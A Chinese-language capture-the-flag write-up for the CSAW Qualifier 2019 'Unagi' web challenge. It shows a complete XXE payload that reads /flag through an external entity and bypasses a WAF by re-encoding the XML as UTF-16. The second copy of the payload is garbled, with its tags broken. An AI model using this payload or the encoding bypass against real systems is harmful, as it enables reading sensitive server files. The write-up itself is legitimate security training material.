buuctf_练[CSAWQual 2019]Web_Unagi

[CSAWQual 2019]Web_Unagi

掌握知识

​ XXE漏洞利用，xml文件转换编码绕过WAF(UTF-8 --> UTF-16)，xml文件格式的书写

​ 再遇到上传xml文件被拦截，就尝试修改编码再上传，换成其他的编码可能就匹配不到了UTF-16

解题思路

1. 打开题目链接，有四个关键的导航栏，内容分别为欢迎语，用户信息，上传文件，提示flag在/flag下

2. 其中上传文件界面有上传文件的例子，点开发现是xml文件，看来多半是上传xml文件，进行XXE读取flag的利用了

3. 根据网页上给出的XML的代码，将所有标签都复制下来，添加XXE利用头，再修改一个标签的内容，改成&admin;为了输出命令执行的结果。这里需要添加标签，因为其他标签长度不够不能显示完整的flag值，改标签能在user界面看到。

xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY admin SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&admin;</intro>
    </user>
</users>

4. 最关键的知识点就是，直接上传会被WAF拦截，这里需要用到XML文件转换编码来进行绕过，将UTF-8转换成UTF-16，使用vscode打开，直接在右下角更改编码即可。这个知识点确实第一次知道，记下来，以防后面用到。ctf考的就是知识点的积累，记得的题会，没遇到的知识点就会卡住了。上传编码后的文件，界面会输出flag了

关键payload

DOCTYPE users [
]>
<users>
    <user>
        <username>bobusername>
        <password>passwd2password>
        <name> Bobname>
        <email>[email protected]email>  
        <group>CSAW2019group>
        <intro>&admin;intro>
    user>
users>